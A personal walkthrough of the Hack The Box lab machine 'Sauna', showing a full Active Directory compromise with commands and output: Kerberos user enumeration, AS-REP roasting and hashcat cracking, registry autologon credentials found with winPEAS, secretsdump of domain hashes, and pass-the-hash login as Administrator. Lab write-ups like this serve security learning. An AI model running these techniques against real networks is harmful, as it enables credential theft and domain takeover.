Welcome to another of my HTB walkthroughs! I found Sauna to be a really onerous machine, I don't mean difficult because the difficulty is relative, what can be complex for me can be simple for others. I'm at the beginning and I'm still a newbie in this area, I have much more to learn, but if you are here to read this tutorial, we are probably in the same boat. Lets jump right in!

We start off with our usual nmap command:

nmap -p 1-65535 -T4 -A -v 10.10.10.175

And I report only the list of the open ports:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-15 00:15:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  unknown
49673/tcp open  unknown
49675/tcp open  unknown
49686/tcp open  unknown
55454/tcp open  unknown

My first approach was to search the specified port on exploit-db. Nothing particular to highlight, lots of exploits,but I need a direction. There's a Web Portal on the server, with IIS, this could be another attack point. Looking at this, I found on the about page some employees of the company (name and surname).

I start to have an idea, confirmed after reading in the forum. These people can have an account on the machine, we just have to understand the username used for each one. We can prepare a list of usernames created with standard rules that are usually used to create a domain account (name.surname, the first letter of the name and the full surname, and so on). Well, I put inside also the standard user (administrator, guest, etc...) and finally my list was about 150 records.

At this point I start a brute-forcing with the smb_login exploit on metasploit framework, but, after many tries, I got nowhere. I tried with different dictionaries, but nothing. I repeat the exploit thinking to have lost some output from the console. Nothing. So I go to read in the forum for tips and I read the simplest sentence that made no sense but "turned on" the light; something like "nice hint on the picture". Looking the picture you can read the number 88, so I understand that I have to concentrate on that port. But on the 88 port there is a kerberos service, so I proceed to identify a possible exploit on it.

msf5 > search kerbero

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
   1  auxiliary/gather/get_user_spns                       2014-09-27       normal  No     Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
   2  auxiliary/gather/kerberos_enumusers                                   normal  No     Kerberos Domain User Enumeration
   3  auxiliary/scanner/winrm/winrm_login                                   normal  No     WinRM Login Utility
   4  post/windows/escalate/golden_ticket                                   normal  No     Windows Escalate Golden Ticket

Really good, five exploits and the third one attracts my attention, "enumeration". I don't lose other time, study this exploit and use it. During the execution it all works fine until the process arrives at the username "fsmith", that produces an error. I try it again, but the process stops exactly with this user, so, I truncated the list and continued with the enumeration. No other user provides an error. I understand that probably this is my attack point (should be an error on the script that I have to correct, but let to go on for now).

msf5 > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > options 

Module options (auxiliary/gather/kerberos_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      yes       The Domain Eg: demo.local
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      88               yes       The target port
   Timeout    10               yes       The TCP timeout to establish connection and read data
   USER_FILE                   yes       Files containing usernames, one per line

msf5 auxiliary(gather/kerberos_enumusers) > set domain .
domain => .
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.175
rhosts => 10.10.10.175
msf5 auxiliary(gather/kerberos_enumusers) > set user_file work-on-this.txt
user_file => work-on-this.txt
msf5 auxiliary(gather/kerberos_enumusers) > 


[...]
[*] Using domain: EGOTISTICALBANK...
[*] 10.10.10.175:88 - Testing User: "fsmith"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x000055a3a6e83b00>
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed

Ok, I have an account, a DOMAIN name (you can see at the start of the process), but I have to understand how to attack the kerberos service.  I search on google for a little and finally, I found this: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/. Good, my next tool will be impacket.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python3 GetNPUsers.py EGOTISTICALBANK/fsmith -format hashcat -outputfile ../../fsmith.hash -dc-ip 10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICALBANK:d2c96f571f61f3bd4a076921c435cf32$c9b239a5aa12b5bb81981651f87cb3f9837d20a713167932f90d5213cb07528fb714cff2189f57496b3fc695c070a719632816abfd0eede593dce8f9d1d1fe41debd87a2bef58337429c6a681f1f08163c74499ffba1d12e6ffa91418f0107ca047b795926473b49f02c530f5bcd2804438b45fc8dbc9ff67c3a5eaed8dd9bcf3011ba7c79212810ae4abc43a0643cf3cae58967b6e0f61ac4d690020b42a039f1f234d2e61e627876fbc1b51a280ffdeea9a10665af99dae5e094d1d96894a60f63bb634e3cdcb2eadf471e09a74c2005a4a4cac0c3131fac78938f51eb16b699bb335a0a1225c3226664574e2c40b6596ad5abc8a27de7ee

I used the command in the first way I found and it asks me for the password of the user, when I enter without a password the tool automatically takes the TGT hash, but to be precise, the command could be launched with the parameter -request and it  immediately takes what you need.

Moving forward there are two different tools you can use to revert an hash, john the ripper or hashcat; I prefer the second one.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 18200 --force -a 0 fsmith.hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.e76a9994.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

$krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b173de8636f4cbb2874ed$20fa322b00d05c32855ea95415e62e5c722def4c3c43f0bc7812b5785655c1d039ceb1cd753acb618ae27bcb6e35179f6d8e43e8806a6504245659728984395308b176ee9cff499c07ee378feef8b5225ea2212e5578096efbc64a542c44493b602f4b159283fed9206a3c0871b84926b4a039217239db4d5ce3efacc9b179150b736a724839e1e5726304ad500cf9287c350cb555e545342c9fd5fedc1436c65f5ab122c44ef0a80b260099e14caa771d48b131adffa03073a1ac21c1a97891cb4f6fa70977d8175cd80cf093518dfc2b2fa7703a2d4436b0eea7899525556267e0571d2b4656b372bbee9ea0e7cd3d5b900f65aed45010d1:Thestrokes23
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b17...5010d1
Time.Started.....: Sat Mar 21 14:21:32 2020 (1 min, 28 secs)
Time.Estimated...: Sat Mar 21 14:23:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   120.9 kH/s (10.32ms) @ Accel:32 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Thelittlemermaid

Started: Sat Mar 21 14:21:10 2020
Stopped: Sat Mar 21 14:23:01 2020


The number 18200 I use in the command is the algorithm type of the hash that is used to recover the keyword, based on the specifics described in the table reported on this page https://hashcat.net/wiki/doku.php?id=example_hashes.

Ok, I have a username, a password and a windows machine... Evil-WinRM.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\fsmith -p 'Thestrokes23' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

*Evil-WinRM* PS C:\Users\FSmith\Documents> pwd

Path
----
C:\Users\FSmith\Documents



*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ..


    Directory: C:\Users\FSmith


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020  10:01 AM                Desktop
d-r---        3/21/2020   1:49 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        3/21/2020   1:17 PM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../Desktop


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Documents> type ../Desktop/user.txt
1******************************f


And the first flag is mine! After this, I lose a huge amount of time understanding what I have to do. I navigated through the folders, searching for some information left unsecured, I executed the whoami command, searched hidden folders, tried to execute commands on the machine, export the SYSTEM voice on the HKLM registry file to try to hack the ntds.dit file, and so on, but nothing. I have to back to the forum (yeah, I know I'm a bit lazy) and found a useful tip, a comment that mentioned the tool w**PEAS... We are working on a windows machine, it's not so complex to understand that probably the full name of the tool is winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). I'm right. So again, proceed to study the tool and act the exploit.

Well, I download the tool and upload on the remote machine through the related command of Evil-WinRM. The tool took a long time to extract the information of the machine. I was impressed with the amount of information he managed to extract and it took me a long time to read the whole report, but in the end, I found something interesting.

[...]
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Files an registry that may contain credentials <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Searching specific files that may contains credentias.
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
[...]


This user could be used to some service autostart or to login into the machine automatically, but this is not important, what is important is that I have another password, but, there's something strange, the user is not what I have found on the users' folder of the machine.

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../..


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr


Anyway, I have to try and understand if it is a valid password or not.

in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmanager -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1


As I supposed, I try the user I think is the real one.

in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmgr -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 


Great, but I'm not the administrator. So again I spend a lot of time to understand what I need to do to go on and complete the machine. This time the forum doesn't help me (but I was concentrated on the wrong post). Someone was suggesting to use a bloodhound tool to investigate the machine's entities; from the official github page "BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment".

I download it, install it, use it, upload a file to export information from the remote machine, import in the tool and deepen in the graph of the machine, searching useful information. I found also something interesting for sure, this is an alternative way to my final solution I adopt to take the second flag, but in my case, what I found didn't work for me. I don't know if the exploit that this tool suggested me was the correct one (mimikatz). I try to use it in all ways, but it stops for errors (something related with the PowerShell that I was connected to I suppose), but I have to search another way. The forum suggests two simple words that drive me on the right decision: secret and dump. I identify secretsdump.py, another tool of the impacket kits.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python secretsdump.py EGOTISTICALBANK/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:8914a5faf0ea6625c5793685b8055117:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:83a8b70cc5c7c52c671dffc79a6adce3f51146b482011f6638ce8b79088823ab
SAUNA$:aes128-cts-hmac-sha1-96:e54efb10e8049b98e008163080244446
SAUNA$:des-cbc-md5:6837e9a2ea0852bc
[*] Cleaning up... 


Others hash to decrypt, we already use below the hashcat tool, so come back to the table with the algorithm to identify the right one and proceed (#1000).

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 1000 -a 0 --force admin.hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Approaching final keyspace - workload adjusted.  

Session..........: hashcat                       
Status...........: Exhausted
Hash.Type........: NTLM
Hash.Target......: d9485863c1e9e05851aa40cbb4ab9dff
Time.Started.....: Sun Mar 22 18:23:29 2020 (15 secs)
Time.Estimated...: Sun Mar 22 18:23:44 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1030.5 kH/s (0.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Sun Mar 22 18:23:26 2020
Stopped: Sun Mar 22 18:23:45 2020


What? an unexpected surprise! Now? I have to try other dictionaries, but then I think that it will be nice if I could direct the hash to connect to the machine, so, a fast check on the Evil-WinRM tool and... Fantastic, I can!

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

---------------------------------------------------------

*Evil-WinRM* PS C:\Users\Administrator\Documents> more ../Desktop/root.txt
f******************************f

Thats the last flag! But let me say that this was a really complex machine for me this time, a real sauna!

The awesome image used in this article was created by Adam Makowczenko.